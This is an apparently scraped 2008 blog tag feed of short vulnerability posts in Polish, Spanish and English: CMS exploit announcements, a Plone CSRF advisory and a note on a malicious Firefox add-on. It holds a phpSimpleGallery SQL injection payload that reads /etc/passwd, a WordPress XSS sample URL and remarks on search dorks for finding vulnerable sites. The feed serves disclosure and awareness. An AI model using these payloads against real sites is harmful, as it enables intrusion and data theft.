vuln « WordPress.com Tag Feed

dno

irk4z — Tue, 24 Jun 2008 12:45:32 +0000

W ostatnim czasie zapanował na milw0rm straszny natłok publikacji. Nic dziwnego, w końcu skończyła się szkoła, ludzie mają więcej czasu na jakieś swoje audyty. Ale niestety ilość publikacji nie idzie w parze z ich jakością. I tak: mamy mnóstwo publikacji błędów w stylu "nieznany-i-nieuzywany CMS Multiple Vulnerabilities" w nieużytecznych skryptach używanych najczęściej na kilku stronach w jakimś Maroku czy Republice Konga. Jest naprawdę mało osób które starają się trochę potrudzić i nie szukać błędów w byle czym.

Może też powinienem zacząć publikować dziennie po 10-12 podatności?

Cross-Site Request Forgery en Plone 3.0.x

Julián Rodríguez — Tue, 17 Jun 2008 19:52:44 +0000

Se ha encontrado una vulnerabilidad en Plone 3.0.x que podría ser explotada por un atacante remoto para realizar ataques de cross-site request forgery (XSRF).

Plone es un Sistema de Gestión de Contenidos (CMS) de código abierto, basado en Zope y programado en Python. Dispone un entorno gráfico tipo web y permite múltiples funciones, llegando a utilizarse frecuentemente como CRM.

La vulnerabilidad está confirmada para las versiones 3.0.x y no afectaría a las versiones 3.1.x. La vulnerabilidad de cross-site request forgery (XSRF) o falsificación de peticiones entre sitios, se basa en explotar la confianza que un determinado sitio web tiene con un usuario. Un atacante remoto podría explotar este problema para cambiar ciertas configuraciones de seguridad de un usuario que se conecta con una sesión válida en Plone.

Se recomienda instalar el parche que solventa la vulnerabilidad para las versiones 3.0.x, disponible desde:
http://plone.org/products/plone-hotfix/releases/CVE-2008-0164/PloneHotfix-CVE-2008-0164.tar.gz

O instalar la versión 3.1.2 de plone, disponible desde:
http://plone.org/download

Más Información:

Plone Hotfix CVE-2008-0164
http://plone.org/products/plone-hotfix/releases/CVE-2008-0164

Mambo <= 4.6.4 Remote File Inclusion Vulnerability

irk4z — Sat, 14 Jun 2008 06:00:51 +0000

Programiści Mambo nie przejrzeli dokładnie kodu swojego skryptu, zostawili możliwość zdalnego dołączenia swojego skryptu. Exploit działa gdy register_globals == ON. Tutaj znajduje się link do mojej publikacji na milw0rm.

CMSimple 3.1 Local File Inclusion / Arbitrary File Upload

irk4z — Sat, 31 May 2008 09:22:00 +0000

"Powered by CMSimple", sprawdzcie w wyszukiwarce search.yahoo.com . Podatnych stron jest naprawdę dużo :/ Nie ma się co później dziwić że w internecie na każdym kroku można złapać jakiegoś robaka. Exploit opublikowany na milw0rm.com

Firefox Vietnamese Vulnerability

msbasic — Sun, 11 May 2008 14:47:04 +0000

Hello, Folks!

Detected by many pplz and AVs (also Mozilla company detected), you may be under malicious use... If you downloaded vietnamese pack add-on for Mozilla Firefox (I barely use Firefox so I'm not infected), you may be under malicious use /!DONT BE ALARMED!\, this may be a weak or medium type vulnerability that will show up some pop-ups (Maybe so much popups depending of wat sites you visit). I'm scanning now, for more information go to Mozilla's Blog Article about this vulnerability. I will update this article l8r when I found out more, Read the next to know more about the vulnerability:

The files which contain that malicious code are detected as W32/Xorer.T.

This instruction resolves to: http://js.k0102.com/01.asp , don’t worry because this URL is currently offline.

The question is: how can anybody be sure that their computer is malware free?

You can check it in any AV online scanner.

Reproducible: Always

Steps to Reproduce:
1. Go to http://addons.mozilla.org/firefox/addon/5954
2. Save the xpi file
3. Scan that file with Avast, Kaspersky or any antivirus you have, 2/3 will
detect it.

UPDATE: A totally Hex Editor Scan Has been doing by unixrange (we're just partners) Watch video on http://www.youtube.com/watch?v=jDMHp2HjpBQ

Scans performed by me:

What i've scanned, it says it makes a chrome dirctory and acess it to make it as the vuln temporary folder, but I'm not really sure about it, some codes make me confused!

So be aware, I Showed You the danger...

phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability

irk4z — Sun, 16 Mar 2008 18:48:35 +0000

Znalazłem podatność w phpbp w najnowszej wersji, ze wszystkimi fixami, błąd banalny, zwykłe przeoczenie programisty zamiast $_GET['id'] filtrował $_POST['id'].. Ogólnie kod skryptu ciekawy, choć jakbym dłużej nad nim posiedział to zapewne znalazł bym jeszcze kilka błędów. Brawo dla supportu phpbp (szczególnie dla Leszka Piątka) za szybkie wydanie odpowiedniego patcha ;) Link do podatności na milw0rmie

fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability

irk4z — Sat, 15 Mar 2008 08:07:17 +0000

Sprawdziłem fuzzylime cms pod względem błędów i opublikowałem najważniejszy, który dostrzegłem. Błąd znajduje się w pliku /code/display.php. Wywołany z innego kontekstu, powoduje ze można dołączyć zdalnie plik. Poza tą podatnością znalazłem jeszcze kilka LFI, których na razie nie publikuje.

phpSimpleGallery Version 1.0 sql injectin

sniper456 — Tue, 15 Jan 2008 19:46:31 +0000

[code]Advisory #00001

######################################
# phpSimpleGallery Version 1.0 sql injection#
######################################

Autor:Sniper456

Contact:Sniper456[at]gmail.kom

Greetss: PescaoDeth, Vampirin456 and my chilean people ;)

**SQL:
gallery.php?page=4&eventID=96[inyecta]

**Example:
gallery.php?page=4&eventID=96/**/union/**/select/**/1,load('/etc/passwd'),3,4,5,6,7,8,9--

Dork: fuck ;)

######################################

# Fro000M chiLe my frieeeenD! 2004 #

######################################[/code]

"powered by jPORTAL 2 & UserPatch" || "powered by jPORTAL 2"

irk4z — Sat, 29 Dec 2007 18:26:18 +0000

^ zobaczcie w googlach te dorki i zastanówcie się co by było gdyby istniał uniwersalny sploit na owy skrypt ;] masakra... jPortal od początku był dziurawy..

dzisiaj (a własciwie wczoraj) znalazłem kilka podatnosci w jPORTALU z poprawkami UserPatch; na razie publikuje jedną, chyba najbardziej krytyczną.

PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln

irk4z — Thu, 27 Dec 2007 00:48:02 +0000

PNphpBB2 podatne na lokalne włączenie pliku ;] Śmieszny skrypcik, Kacper znalazł w nim dziure w czerwcu tego roku, miesiąc później Coloss. Dużo stron stoi na tym sofcie, w przeciągu kilku minut znalazłem przez google sześć podatnych stron, a zapewniam że jest ich więcej. Poza tym jest jeszcze LFI w pninit.php analogicznie w zmiennej phpEx. Podatność możecie zobaczyć na milw0rm.com lub tutaj: sploitpnphpbb2.txt Ok idę spać..

WordPress 2.2 XSS

javik — Thu, 14 Jun 2007 15:37:54 +0000

From: "John Smith" <zamolx3@gmail.com>
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: Wordpress default theme XSS (admin) and other problems
Date: Fri, 8 Jun 2007 16:15:38 +0300

There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2

Filename functions.php, line 387.
Code:

<form style="display: inline" method="post" name="hicolor" id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">

$_SERVER['REQUEST_URI'] is directly echoed to the user.

This problem can be exploited if the adminstrator is logged in.

Sample exploit URL.
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><script>alert(1)</script>

There are other XSS vulnerabilities in popular Wordpress themes.
More details on http://www.xssnews.com/